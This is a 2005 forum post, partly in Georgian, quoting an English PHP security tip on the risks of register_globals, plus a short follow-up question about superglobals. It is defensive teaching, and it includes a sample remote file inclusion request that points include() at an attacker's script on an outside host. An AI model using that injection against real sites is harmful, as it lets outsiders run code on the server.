#1543893 · 24 Jun 2005, 16:06 · · პროფილი · პირადი მიმოწერა · ჩატი
ინგლისური თუ იცი...
3. Be careful when using register_globals = ON
This has been a major issue since this feature was invented. It was originally designed to make programming in PHP easier (and that it did), but misuse of it often led to security holes. As of PHP 4.2.0, register_globals is set to OFF by default. It is recommended that
you use the superglobals to deal with input( $_GET, $_POST, $_COOKIE, $_SESSION, etc).
For example, let us say that you had a variable that specified what page to include:
PHP Code:
include($page);
But you intended $page to be defined in a config file or somewhere else in the script, and not to come as user input. In one instance you forgot to pre-define $page. If register_globals is set to on, the malicious user can take over and define $page for you, by calling your script like this:
script.php?page=http://www.example.com/evilscript.php
I recommend that you develop with register_globals set to OFF, and use the superglobals when accessing user input. In addition, you should always develop with full error reporting, which can be specified like this (at the top of your script):
PHP Code:
error_reporting(E_ALL);
This way, you will receive a notice for every variable you try to call that was not previously defined. Yes, PHP does not requre you to define variables so there may be notices that you can ignore, but this will help you to catch undefined variables that you did expect to come from input or other sources. In the previous example, when $page was referenced in the include() statement, PHP would issue a notice that $page was not defined.
Whether or not you want to use register_globals is up to you, but make sure you are aware of the advantages and disadvantages of it and how to remedy the possible security holes.
--------------------
შენ ეგა თქვი!
|
php cvadebi, $saxeli=$_GET an POST[“name”]; amos gareshe ar shidzleba?
